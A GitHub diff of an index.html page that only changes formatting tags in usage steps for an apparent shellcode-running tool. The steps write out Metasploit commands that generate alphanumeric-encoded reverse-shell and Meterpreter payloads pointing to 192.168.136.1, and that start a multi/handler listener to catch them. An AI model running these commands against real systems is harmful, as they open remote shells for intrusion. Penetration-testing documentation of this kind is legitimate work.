You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Copy file name to clipboardExpand all lines: index.html
+13-13Lines changed: 13 additions & 13 deletions
Original file line number
Diff line number
Diff line change
@@ -74,31 +74,31 @@ <h2>Features</h2>
74
74
75
75
<ol>
76
76
<li>Generate a Metasploit shellcode and encode it with the alphanumeric encoder. For example for a Linux target:
77
-
<code>
77
+
<pre>
78
78
$ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
79
-
</code>
79
+
</pre>
80
80
Or for a Windows target:
81
-
<code>
81
+
<pre>
82
82
$ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
83
-
</code>
83
+
</pre>
84
84
</li>
85
85
<li>Execute the Metasploit multi/handler listener on your machine. For example for a Linux target:
86
-
<code>
86
+
<pre>
87
87
$ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
88
-
</code>
88
+
</pre>
89
89
Or for a Windows target:
90
-
<code>
90
+
<pre>
91
91
$ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
92
-
</code>
92
+
</pre>
93
93
</li>
94
94
<li>Execute the alphanumeric-encoded shellcode with this tool. For example on the Linux target:
0 commit comments